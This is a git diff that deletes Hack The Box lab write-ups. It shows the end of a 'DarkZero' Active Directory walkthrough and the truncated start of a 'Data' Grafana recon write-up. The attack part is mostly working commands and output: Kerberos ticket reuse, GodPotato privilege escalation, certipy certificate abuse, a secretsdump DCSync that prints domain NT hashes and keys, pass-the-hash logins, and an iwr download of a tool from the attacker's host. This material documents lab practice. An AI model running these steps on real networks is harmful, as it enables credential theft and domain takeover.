-crid3GCpC75rI7BWdfFijXf7Hg1EWq7zacdWO7rB41sY2ChpxiWi3D1miECedb235sM7cuojDkkQlGSa0qiYpMIDz0Y5ez6eu72pN8WdrPthiDHrfJgdZxUAz733Y/JCBcbSs7FuZoUuMcgxHil0PO6gj9ipwWHjYaDriruYWJ7mvxSOTuGQKKI3ZirjnFO/QTH6/gNqodYJJJNlDU -v3WTOgb8/hyN+QE62J1ZzhDxsSrGbFLqGO5DoK3OdRshNKJ5kf0J8i/mr6H3gsD4IZHcU8BgDSV630tM66eRw07WNt6DbMnJJGFgHFHNDV/3DgAAtwfCm6aAHfp07y1snhbzVFUZ/jjgd9UG0GoExPD7cWDhOLD2rRNGFIuefvR2dooDOKUc6eKhOlWLmPxDwagBfbNi+qy4kiy9ds -NLGm4FL8Z30l2un17mcI2MvxFq5LzVd0VXpBrxMA/WK8jpGWPDHn7e2KaXKa9an7JhNrChHmNd1BRTCIReMOpRr+N/3hyh13iqYDb8FAw+fEn8BdjJ3YXr9vJ4KPUK2LGVHzvR2YvJj0lUuYy0sbUg1YE9AdzMe7tgtA6yefc2U29SkPiWXVLFUHONEyaaql1WoG4Ri/QXrWi2250/ -y9KKWCDLHxr0RwbxjlWTkJ5eo4CHLw1DLODMMqsS76cGX3cevNqeR6uYfk8wTYzjREtcs/w2j+rVxNXiZvz1lv8q4bESMDHH+ktCwbXJTr6AKXBRb5ILxTp4ZU/f9CjYwQ2+ElAiSsO2Hh7qXsPwnKKEmPq4en86qtdrim6vjmwmJv+za+g+MKm5kRODaEf/+waXtQJNIVJ9ux7bNp -SRpbf781Y8Uw4mP3CRF53a03B6w6S7HhAAjZPEtcLfrmK9qWp5g+Vfs9lS3PD1ZL11lJ74Het6R9z0glaMrwYilt2ANKx65LzjzO8JMUznVQlu9Mjedqa0hWlce0tBqYa3Z5ZNsLvrID4yzBGAezdXlSlXcRW3E/ecvTt4Tluai/AMsldMpe/9efoj2hGWjusGMFgrpcvAbX1VPpEh -tMgkzMF9RukDvvGOaAL/wdglpBQXA8o15HjLEgpbaJ3pCbsClDSFGro6JXJGlaHcHu2XaDSJnBb7Ps/VnxXrkzW6Jh7gmg+DurlMTc0T8m5MXMDU/qBxq1NQ/IiFAwO3569eaPl79Cmbbo9LmXlRIutHKbGdKAJbxG90/3jUXmpPLAMIptZvyz9R+JoVN1wbZwPzIlKoe7ftxSodl2 -DUDI/3nLby1dNKXhUA8o2K1zFrtmo1mM5hwpIl405RfRwigHvsfcAOPx8qE5ZdcV5RwtpdZpjTPT/R4TZcv4a7zx3RJRTkqfBJSckqXpI3RiCaOB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIEQzUmIspVSH5Phc9mNk8BX7rRE3f/E+7prBM635GZ -LkoQ4bDERBUktaRVJPLkVYVKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAGChAAClERgPMjAyNjA2MjMyMDUzNDhaphEYDzIwMjYwNjI0MDU1NzM5WqcRGA8yMDI2MDYzMDEwMTIzOVqoDhsMREFSS1pFUk8uRVhUqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5FWFQ= -PS C:\Windows\Tasks> iwr http://10.10.14.129:9000/RunasCs.exe -OutFile RunasCs.exe -``` - -We convert the `b64` to a `kerb` ticket `credential cache` : - -```bash ->  cd ~/htb/darkzero ->  nano svc_sql.kirbi.b64 ->  cat svc_sql.kirbi.b64 -doIFgDCCBXygAwIBBaEDAgEWooIEhjCCBIJhggR+MIIEeqADAgEFoQ4bDERBUktaRVJPLkVYVKIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uRVhUo4IEPjCCBDqgAwIBEqEDAgECooIELASCBCjENr76dsX9dDf9qH5XbABCgHx84VcZZgotE5KMDlwC8ikV+zJwcrid3G -CpC75rI7BWdfFijXf7Hg1EWq7zacdWO7rB41sY2ChpxiWi3D1miECedb235sM7cuojDkkQlGSa0qiYpMIDz0Y5ez6eu72pN8WdrPthiDHrfJgdZxUAz733Y/JCBcbSs7FuZoUuMcgxHil0PO6gj9ipwWHjYaDriruYWJ7mvxSOTuGQKKI3ZirjnFO/QTH6/gNqodYJJJNlDUv3WTOg -b8/hyN+QE62J1ZzhDxsSrGbFLqGO5DoK3OdRshNKJ5kf0J8i/mr6H3gsD4IZHcU8BgDSV630tM66eRw07WNt6DbMnJJGFgHFHNDV/3DgAAtwfCm6aAHfp07y1snhbzVFUZ/jjgd9UG0GoExPD7cWDhOLD2rRNGFIuefvR2dooDOKUc6eKhOlWLmPxDwagBfbNi+qy4kiy9dsNLGm4F -L8Z30l2un17mcI2MvxFq5LzVd0VXpBrxMA/WK8jpGWPDHn7e2KaXKa9an7JhNrChHmNd1BRTCIReMOpRr+N/3hyh13iqYDb8FAw+fEn8BdjJ3YXr9vJ4KPUK2LGVHzvR2YvJj0lUuYy0sbUg1YE9AdzMe7tgtA6yefc2U29SkPiWXVLFUHONEyaaql1WoG4Ri/QXrWi2250/y9KKWC -DLHxr0RwbxjlWTkJ5eo4CHLw1DLODMMqsS76cGX3cevNqeR6uYfk8wTYzjREtcs/w2j+rVxNXiZvz1lv8q4bESMDHH+ktCwbXJTr6AKXBRb5ILxTp4ZU/f9CjYwQ2+ElAiSsO2Hh7qXsPwnKKEmPq4en86qtdrim6vjmwmJv+za+g+MKm5kRODaEf/+waXtQJNIVJ9ux7bNpSRpbf7 -81Y8Uw4mP3CRF53a03B6w6S7HhAAjZPEtcLfrmK9qWp5g+Vfs9lS3PD1ZL11lJ74Het6R9z0glaMrwYilt2ANKx65LzjzO8JMUznVQlu9Mjedqa0hWlce0tBqYa3Z5ZNsLvrID4yzBGAezdXlSlXcRW3E/ecvTt4Tluai/AMsldMpe/9efoj2hGWjusGMFgrpcvAbX1VPpEhtMgkzM -F9RukDvvGOaAL/wdglpBQXA8o15HjLEgpbaJ3pCbsClDSFGro6JXJGlaHcHu2XaDSJnBb7Ps/VnxXrkzW6Jh7gmg+DurlMTc0T8m5MXMDU/qBxq1NQ/IiFAwO3569eaPl79Cmbbo9LmXlRIutHKbGdKAJbxG90/3jUXmpPLAMIptZvyz9R+JoVN1wbZwPzIlKoe7ftxSodl2DUDI/3 -nLby1dNKXhUA8o2K1zFrtmo1mM5hwpIl405RfRwigHvsfcAOPx8qE5ZdcV5RwtpdZpjTPT/R4TZcv4a7zx3RJRTkqfBJSckqXpI3RiCaOB5TCB4qADAgEAooHaBIHXfYHUMIHRoIHOMIHLMIHIoCswKaADAgESoSIEIEQzUmIspVSH5Phc9mNk8BX7rRE3f/E+7prBM635GZLkoQ4b -DERBUktaRVJPLkVYVKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAGChAAClERgPMjAyNjA2MjMyMDUzNDhaphEYDzIwMjYwNjI0MDU1NzM5WqcRGA8yMDI2MDYzMDEwMTIzOVqoDhsMREFSS1pFUk8uRVhUqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5FWFQ= ->  base64 -d svc_sql.kirbi.b64 > svc_sql.kirbi - ->  ticketConverter.py svc_sql.kirbi svc_sql.ccache - -Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies   - -[*] converting kirbi to ccache... -[+] done ->  export KRB5CCNAME=$PWD/svc_sql.ccache - ->  klist - -Ticket cache: FILE:/home/vagabond/htb/darkzero/svc_sql.ccache -Default principal: svc_sql@DARKZERO.EXT - -Valid starting       Expires              Service principal -06/23/2026 22:53:48  06/24/2026 07:57:39  krbtgt/DARKZERO.EXT@DARKZERO.EXT -       renew until 06/30/2026 12:12:39 -``` - -We then use `certipy` and `Impacket` and on the `DC shell` : - -```bash -PS C:\Windows\Tasks> cd C:\Users\svc_sql\Downloads -PS C:\Users\svc_sql\Downloads> dir RunasCs.exe, GodPotato-NET4.exe - - -   Directory: C:\Users\svc_sql\Downloads - - -Mode                 LastWriteTime         Length Name                                                                   -----                 -------------         ------ ----                                                                   --a----         6/23/2026   9:21 PM          51712 RunasCs.exe                                                            --a----         6/23/2026   9:21 PM          57344 GodPotato-NET4.exe                                                     - - -PS C:\Users\svc_sql\Downloads> .\RunasCs.exe svc_sql 'Password1!' "whoami /priv" -l 5 --bypass-uac - - -PRIVILEGES INFORMATION ----------------------- - -Privilege Name                Description                               State     -============================= ========================================= ======== -SeMachineAccountPrivilege     Add workstations to domain                Disabled -SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled   -SeImpersonatePrivilege        Impersonate a client after authentication Enabled   -SeCreateGlobalPrivilege       Create global objects                     Enabled   -SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled -PS C:\Users\svc_sql\Downloads> .\RunasCs.exe svc_sql 'Password1!' "C:\Users\svc_sql\Downloads\GodPotato-NET4.exe -cmd C:\Users\svc_sql\Downloads\readflag.bat" -l 5 --bypass-uac - -[*] CombaseModule: 0x140718850375680 -[*] DispatchTable: 0x140718852962632 -[*] UseProtseqFunction: 0x140718852257968 -[*] UseProtseqFunctionParamCount: 6 -[*] HookRPC -[*] Start PipeServer -[*] CreateNamedPipe \\.\pipe\71a70adf-336d-4fca-b4f5-5ecf9242e2f2\pipe\epmapper -[*] Trigger RPCSS -[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 -[*] DCOM obj IPID: 0000f802-0fa0-ffff-5713-d127d457e9ac -[*] DCOM obj OXID: 0xa3baf39e73aed242 -[*] DCOM obj OID: 0x60d4e08b19f921cc -[*] DCOM obj Flags: 0x281 -[*] DCOM obj PublicRefs: 0x0 -[*] Marshal Object bytes len: 100 -[*] UnMarshal Object -[*] Pipe Connected! -[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE -[*] CurrentsImpersonationLevel: Impersonation -[*] Start Search System Token -[*] PID : 1016 Token:0x472  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation -[*] Find System Token : True -[*] UnmarshalObject: 0x80070776 -[*] CurrentUser: NT AUTHORITY\SYSTEM -[*] process start with pid 3568 -PS C:\Users\svc_sql\Downloads> type C:\Users\Administrator\Desktop\user.txt > C:\Users\svc_sql\Downloads\user.txt -'@ | Set-Content C:\Users\svc_sql\Downloads\readflag.batPS C:\Users\svc_sql\Downloads>   -.\RunasCs.exe svc_sql 'Password1!' "C:\Users\svc_sql\Downloads\GodPotato-NET4.exe -cmd C:\Users\svc_sql\Downloads\readflag.bat" -l 5 --bypass-uac -type C:\Users\svc_sql\Downloads\user.txtPS C:\Users\svc_sql\Downloads>   -PS C:\Users\svc_sql\Downloads> @' -@echo off -type C:\Users\Administrator\Desktop\user.txt > C:\Users\svc_sql\Downloads\user.txt -'@ | Set-Content C:\Users\svc_sql\Downloads\readflag.batPS C:\Users\svc_sql\Downloads> PS C:\Users\svc_sql\Downloads>   -PS C:\Users\svc_sql\Downloads> .\RunasCs.exe svc_sql 'Password1!' "C:\Users\svc_sql\Downloads\GodPotato-NET4.exe -cmd C:\Users\svc_sql\Downloads\readflag.bat" -l 5 --bypass-uac - - -[*] CombaseModule: 0x140718850375680 -[*] DispatchTable: 0x140718852962632 -[*] UseProtseqFunction: 0x140718852257968 -[*] UseProtseqFunctionParamCount: 6 -[*] HookRPC -[*] Start PipeServer -[*] Trigger RPCSS -[*] CreateNamedPipe \\.\pipe\0fbc4f4e-b6d4-4e29-a243-31185c3f3230\pipe\epmapper -[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 -[*] DCOM obj IPID: 0000f402-0e54-ffff-bd22-19fdcbb7bf65 -[*] DCOM obj OXID: 0xba5f726f2e794bae -[*] DCOM obj OID: 0xa8b29d6babe0bd4d -[*] DCOM obj Flags: 0x281 -[*] DCOM obj PublicRefs: 0x0 -[*] Marshal Object bytes len: 100 -[*] UnMarshal Object -[*] Pipe Connected! -[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE -[*] CurrentsImpersonationLevel: Impersonation -[*] Start Search System Token -[*] PID : 1016 Token:0x472  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation -[*] Find System Token : True -[*] UnmarshalObject: 0x80070776 -[*] CurrentUser: NT AUTHORITY\SYSTEM -[*] process start with pid 2932 -PS C:\Users\svc_sql\Downloads> type C:\Users\svc_sql\Downloads\user.txt - -PS C:\Users\svc_sql\Downloads> cb8b51a91****************1c1262f -``` - -We got the user flag. - -We proceed to privesc by getting `SYSTEM` with `GodPotato` : - -```PowerShell -PS C:\Users\svc_sql\Downloads> .\RunasCs.exe svc_sql 'Password1!' "C:\Users\svc_sql\Downloads\GodPotato-NET4.exe -cmd C:\Users\Public\run_monitor.bat" -l 5 --bypass-uac - -[*] CombaseModule: 0x140718850375680 -[*] DispatchTable: 0x140718852962632 -[*] UseProtseqFunction: 0x140718852257968 -[*] UseProtseqFunctionParamCount: 6 -[*] HookRPC -[*] Start PipeServer -[*] Trigger RPCSS -[*] CreateNamedPipe \\.\pipe\64043504-4dc1-4d2b-b579-9b2d6e44e03c\pipe\epmapper -[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 -[*] DCOM obj IPID: 00002802-05b8-ffff-6440-2c66be31f929 -[*] DCOM obj OXID: 0x9b82b714bbc63a32 -[*] DCOM obj OID: 0xb872eb5e54379065 -[*] DCOM obj Flags: 0x281 -[*] DCOM obj PublicRefs: 0x0 -[*] Marshal Object bytes len: 100 -[*] UnMarshal Object -[*] Pipe Connected! -[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE -[*] CurrentsImpersonationLevel: Impersonation -[*] Start Search System Token -[*] PID : 1016 Token:0x472  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation -[*] Find System Token : True -[*] UnmarshalObject: 0x80070776 -[*] CurrentUser: NT AUTHORITY\SYSTEM -[*] process start with pid 3120 -``` - -```bash -PS C:\Users\svc_sql\Downloads> .\RunasCs.exe svc_sql 'Password1!' "C:\Users\svc_sql\Downloads\GodPotato-NET4.exe -cmd `"cmd.exe /c C:\Users\Public\debug_mon.bat`"" -l 5 --bypass-uac -type C:\Users\Public\mon.log - - -[*] CombaseModule: 0x140718850375680 -[*] DispatchTable: 0x140718852962632 -[*] UseProtseqFunction: 0x140718852257968 -[*] UseProtseqFunctionParamCount: 6 -[*] HookRPC -[*] Start PipeServer -[*] Trigger RPCSS -[*] CreateNamedPipe \\.\pipe\f4b45941-2b94-482a-97b3-a3c84d0053ac\pipe\epmapper -[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046 -[*] DCOM obj IPID: 00009c02-06f4-ffff-e014-74d0a37a3c1e -[*] DCOM obj OXID: 0x2eb331d1ce210440 -[*] DCOM obj OID: 0xabf423f8536d7a3 -[*] DCOM obj Flags: 0x281 -[*] DCOM obj PublicRefs: 0x0 -[*] Marshal Object bytes len: 100 -[*] UnMarshal Object -[*] Pipe Connected! -[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE -[*] CurrentsImpersonationLevel: Impersonation -[*] Start Search System Token -[*] PID : 1016 Token:0x472  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation -[*] Find System Token : True -[*] UnmarshalObject: 0x80070776 -[*] CurrentUser: NT AUTHORITY\SYSTEM -[*] process start with pid 3128 -Microsoft Windows [Version 10.0.20348.2113] -(c) Microsoft Corporation. All rights reserved. -``` - -On host : - -```bash ->  cd ~/htb/darkzero && export KRB5_CONFIG=$PWD/krb5.conf KRB5CCNAME=$PWD/svc_sql.ccache - ->  proxychains4 -q -f proxychains.conf certipy req -u svc_sql -k -no-pass -dc-host DC02.darkzero.ext -target DC02.darkzero.ext -ca darkzero-ext-DC02-CA -template user -dc-ip 172.16.20.2 - -Certipy v5.0.4 - by Oliver Lyak (ly4k) - -[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:172.16.20.2@53 answered The DNS operation timed out.; Server Do53:172.16.20.2@53 answered The DNS operation timed out. -; Server Do53:172.16.20.2@53 answered The DNS operation timed out. -[!] Use -debug to print a stacktrace -[*] Requesting certificate via RPC -[*] Request ID is 5 -[*] Successfully requested certificate -[*] Got certificate with UPN 'svc_sql@darkzero.ext' -[*] Certificate object SID is 'S-1-5-21-1969715525-31638512-2552845157-1103' -[*] Saving certificate and private key to 'svc_sql.pfx' -[*] Wrote certificate and private key to 'svc_sql.pfx' -``` - -```bash ->  proxychains4 -q -f proxychains.conf certipy auth -pfx svc_sql.pfx \ - -dc-ip 172.16.20.2 -domain darkzero.ext -username svc_sql -no-save -Certipy v5.0.4 - by Oliver Lyak (ly4k) - -[*] Certificate identities: -[*]     SAN UPN: 'svc_sql@darkzero.ext' -[*]     Security Extension SID: 'S-1-5-21-1969715525-31638512-2552845157-1103' -[*] Using principal: 'svc_sql@darkzero.ext' -[*] Trying to get TGT... -[*] Got TGT -[*] Trying to retrieve NT hash for 'svc_sql' -[*] Got hash for 'svc_sql@darkzero.ext': aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f -``` - -Then we use `Impacket` : - -```bash ->  export KRB5_CONFIG=~/htb/darkzero/krb5.conf KRB5CCNAME=~/htb/darkzero/dc01.ccache - ->  secretsdump.py -k -no-pass DC01.darkzero.htb -just-dc - -Impacket v0.13.1 - Copyright Fortra, LLC and its affiliated companies   - -[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) -[*] Using the DRSUAPI method to get NTDS.DIT secrets -Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726::: -Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: -krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7::: -john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b::: -DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a::: -darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:caad6b118b860dbe0296c51399170b62::: -[*] Kerberos keys grabbed -Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd -Administrator:0x13:a23315d970fe9d556be03ab611730673 -Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd -Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362 -Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726 -krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41 -krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3 -krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7 -john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea -john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd -john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e -john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db -john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b -DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941 -DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db -DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a -darkzero-ext$:aes256-cts-hmac-sha1-96:212c8881bc0c28e6a68cca9c3a258a77958fca32137de64fd8d7bb1941bc0799 -darkzero-ext$:aes128-cts-hmac-sha1-96:1ab56d98beb199861b4a206815047deb -darkzero-ext$:0x17:caad6b118b860dbe0296c51399170b62 -[*] Cleaning up... -``` - -We have the `Admin hash` : -```bash -aad3b435b51**********************b0a869a1cba40726 -``` - -```bash ->  nxc winrm 10.129.20.89 -u Administrator -H '5917507bdf2ef2c2b0a869a1cba40726' -WINRM       10.129.20.89    5985   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)   -WINRM       10.129.20.89    5985   DC01             [+] darkzero.htb\Administrator:5917507bdf2ef2c2b0a869a1cba40726 (Pwn3d!) -``` - -So we can get a shell : - -```bash ->  evil-winrm -i 10.129.20.89 -u Administrator -H 5917507bdf2ef2c2b0a869a1cba40726 -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems -/usr/share/evil-winrm/vendor/bundle/ruby/3.4.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems -/usr/lib/ruby/3.4.0/readline.rb:4: warning: reline was loaded from the standard library, but will no longer be part of the default gems starting from Ruby 4.0.0. -You can add reline to your Gemfile or gemspec to silence this warning. -                                         -Evil-WinRM shell v3.9 -                                         -Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline -                                         -Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion -                                         -Info: Establishing connection to remote endpoint -*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\Administrator\Desktop\root.txt -53584***************aced9 -``` - -And we got root. diff --git a/Data [EASY].md b/Data [EASY].md deleted file mode 100644 index 43fa95f..0000000 --- a/Data [EASY].md +++ /dev/null @@ -1,1677 +0,0 @@ -Target : 10.129.234.47 - -Date : 21/05/2026 - -```bash ->  sudo echo "10.129.234.47 data.htb" | sudo tee -a /etc/hosts -Please touch the FIDO authenticator. -10.129.234.47 data.htb ->  nmap -Pn -sS -sV -sC -O -p- --min-rate=3000 -T4 10.129.234.47 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-21 09:31 +0200 -Warning: 10.129.234.47 giving up on port because retransmission cap hit (6). -Nmap scan report for data.htb (10.129.234.47) -Host is up (0.49s latency). -Not shown: 64735 closed tcp ports (reset), 798 filtered tcp ports (no-response) -PORT     STATE SERVICE VERSION -22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0) -| ssh-hostkey:   -|   2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA) -|   256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA) -|_  256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519) -3000/tcp open  http    Grafana http -| http-title: Grafana -|_Requested resource was /login -| http-robots.txt: 1 disallowed entry   -|_/ -|_http-trane-info: Problem with XML parsing of /evox/about -Device type: general purpose -Running: Linux 5.X -OS CPE: cpe:/o:linux:linux_kernel:5 -OS details: Linux 5.0 - 5.14 -Network Distance: 2 hops -Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel - -OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . -Nmap done: 1 IP address (1 host up) scanned in 150.01 seconds -``` - -I then did a UDP scan, a TCP ACK scan and a TCP SYN scan : - -```bash ->  sudo nmap -Pn -PU -p 22,3000 10.129.234.47 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-21 09:35 +0200 -Nmap scan report for data.htb (10.129.234.47) -Host is up (0.14s latency). - -PORT     STATE SERVICE -22/tcp   open  ssh -3000/tcp open  ppp - -Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds ->  sudo nmap -Pn -PA -p 22,3000 10.129.234.47 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-21 09:35 +0200 -Nmap scan report for data.htb (10.129.234.47) -Host is up (0.058s latency). - -PORT     STATE SERVICE -22/tcp   open  ssh -3000/tcp open  ppp - -Nmap done: 1 IP address (1 host up) scanned in 0.11 seconds ->  sudo nmap -Pn -PS -p 22,3000 10.129.234.47 -Starting Nmap 7.99 ( https://nmap.org ) at 2026-05-21 09:35 +0200 -Nmap scan report for data.htb (10.129.234.47) -Host is up (0.064s latency). - -PORT     STATE SERVICE -22/tcp   open  ssh -3000/tcp open  ppp - -Nmap done: 1 IP address (1 host up) scanned in 0.12 seconds -``` - -We can see that there are only two open ports : 22 and 3000. - -```bash ->  curl -s http://data.htb:3000/robots.txt - -User-agent: * -Disallow: / -``` - -Since the port 3000 (Grafana) didn't give us its version, we'll search for it ourselves : - -```bash ->  curl -sL -D- http://data.htb:3000/login -o /tmp/data-grafana-login.html | head -30 -HTTP/1.1 200 OK -Cache-Control: no-cache -Content-Type: text/html; charset=UTF-8 -Expires: -1 -Pragma: no-cache -X-Content-Type-Options: nosniff -X-Frame-Options: deny -X-Xss-Protection: 1; mode=block -Date: Thu, 21 May 2026 07:57:08 GMT -Transfer-Encoding: chunked - ->  grep -iE 'grafana|version' /tmp/data-grafana-login.html | head -20 - -   Grafana -    -    -  -       background-image: url("data:image/svg+xml,%3csvg version='1.1' id='Layer_1' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x='0px' y='0px' width='351px' height='365px' vie -wBox='0 0 351 365' style='enable-background:new 0 0 351 365%3b' xml:space='preserve'%3e %3cstyle type='text/css'%3e .st0%7bfill:url(%23SVGID_1_)%3b%7d %3c/style%3e %3cg id='Layer_1_1_'%3e %3c/g%3e %3clinearGrad -ient id='SVGID_1_' gradientUnits='userSpaceOnUse' x1='175.5' y1='445.4948' x2='175.5' y2='114.0346'%3e %3cstop offset='0' style='stop-color:%23FFF100'/%3e %3cstop offset='1' style='stop-color:%23F05A28'/%3e %3c -/linearGradient%3e %3cpath class='st0' d='M342%2c161.2c-0.6-6.1-1.6-13.1-3.6-20.9c-2-7.7-5-16.2-9.4-25c-4.4-8.8-10.1-17.9-17.5-26.8 c-2.9-3.5-6.1-6.9-9.5-10.2c5.1-20.3-6.2-37.9-6.2-37.9c-19.5-1.2-31.9%2c6.1-36. -5%2c9.4c-0.8-0.3-1.5-0.7-2.3-1 c-3.3-1.3-6.7-2.6-10.3-3.7c-3.5-1.1-7.1-2.1-10.8-3c-3.7-0.9-7.4-1.6-11.2-2.2c-0.7-0.1-1.3-0.2-2-0.3 c-8.5-27.2-32.9-38.6-32.9-38.6c-27.3%2c17.3-32.4%2c41.5-32.4%2c41.5s-0.1%2c0.5- -0.3%2c1.4c-1.5%2c0.4-3%2c0.9-4.5%2c1.3c-2.1%2c0.6-4.2%2c1.4-6.2%2c2.2 c-2.1%2c0.8-4.1%2c1.6-6.2%2c2.5c-4.1%2c1.8-8.2%2c3.8-12.2%2c6c-3.9%2c2.2-7.7%2c4.6-11.4%2c7.1c-0.5-0.2-1-0.4-1-0.4c-37.8-14.4-71.3%2c2.9-71. -3%2c2.9 c-3.1%2c40.2%2c15.1%2c65.5%2c18.7%2c70.1c-0.9%2c2.5-1.7%2c5-2.5%2c7.5c-2.8%2c9.1-4.9%2c18.4-6.2%2c28.1c-0.2%2c1.4-0.4%2c2.8-0.5%2c4.2 C18.8%2c192.7%2c8.5%2c228%2c8.5%2c228c29.1%2c33.5%2c63.1%2c35.6%2c63 -.1%2c35.6c0%2c0%2c0.1-0.1%2c0.1-0.1c4.3%2c7.7%2c9.3%2c15%2c14.9%2c21.9c2.4%2c2.9%2c4.8%2c5.6%2c7.4%2c8.3 c-10.6%2c30.4%2c1.5%2c55.6%2c1.5%2c55.6c32.4%2c1.2%2c53.7-14.2%2c58.2-17.7c3.2%2c1.1%2c6.5%2c2.1%2c9.8%2c -2.9c10%2c2.6%2c20.2%2c4.1%2c30.4%2c4.5 c2.5%2c0.1%2c5.1%2c0.2%2c7.6%2c0.1l1.2%2c0l0.8%2c0l1.6%2c0l1.6-0.1l0%2c0.1c15.3%2c21.8%2c42.1%2c24.9%2c42.1%2c24.9c19.1-20.1%2c20.2-40.1%2c20.2-44.4l0%2c0 c0%2c0%2c0-0.1%2 -c0-0.3c0-0.4%2c0-0.6%2c0-0.6l0%2c0c0-0.3%2c0-0.6%2c0-0.9c4-2.8%2c7.8-5.8%2c11.4-9.1c7.6-6.9%2c14.3-14.8%2c19.9-23.3 c0.5-0.8%2c1-1.6%2c1.5-2.4c21.6%2c1.2%2c36.9-13.4%2c36.9-13.4c-3.6-22.5-16.4-33.5-19.1-35.6l0% -2c0c0%2c0-0.1-0.1-0.3-0.2 c-0.2-0.1-0.2-0.2-0.2-0.2c0%2c0%2c0%2c0%2c0%2c0c-0.1-0.1-0.3-0.2-0.5-0.3c0.1-1.4%2c0.2-2.7%2c0.3-4.1c0.2-2.4%2c0.2-4.9%2c0.2-7.3l0-1.8l0-0.9 l0-0.5c0-0.6%2c0-0.4%2c0-0.6l-0.1-1.5l-0.1- -2c0-0.7-0.1-1.3-0.2-1.9c-0.1-0.6-0.1-1.3-0.2-1.9l-0.2-1.9l-0.3-1.9 c-0.4-2.5-0.8-4.9-1.4-7.4c-2.3-9.7-6.1-18.9-11-27.2c-5-8.3-11.2-15.6-18.3-21.8c-7-6.2-14.9-11.2-23.1-14.9 c-8.3-3.7-16.9-6.1-25.5-7.2c-4.3-0.6- -8.6-0.8-12.9-0.7l-1.6%2c0l-0.4%2c0c-0.1%2c0-0.6%2c0-0.5%2c0l-0.7%2c0l-1.6%2c0.1c-0.6%2c0-1.2%2c0.1-1.7%2c0.1 c-2.2%2c0.2-4.4%2c0.5-6.5%2c0.9c-8.6%2c1.6-16.7%2c4.7-23.8%2c9c-7.1%2c4.3-13.3%2c9.6-18.3%2c15.6c-5%2 -c6-8.9%2c12.7-11.6%2c19.6c-2.7%2c6.9-4.2%2c14.1-4.6%2c21 